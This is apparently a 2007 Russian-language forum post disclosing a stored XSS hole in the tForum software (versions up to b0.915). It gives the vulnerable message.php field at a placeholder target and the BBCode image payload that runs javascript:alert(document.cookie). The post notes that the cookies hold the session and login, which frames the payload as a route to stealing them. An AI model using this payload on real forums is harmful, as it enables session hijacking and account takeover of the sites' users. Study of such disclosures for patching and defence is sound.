07.04.2007, 11:01
|
|
Познающий
Регистрация: 22.11.2006
Сообщений: 68
С нами:
10245582
Репутация:
137
|
|
tForum <= b0.915
Форум малораспространённый, но всё же.
Активная XSS в поле "Message".
Код:
http://www.target/path/message.php
Вставляем в поле "Message":
Код:
[img]javascript:alert(document.cookie)[/img]
В кукисах сессия, логин.
|
|
|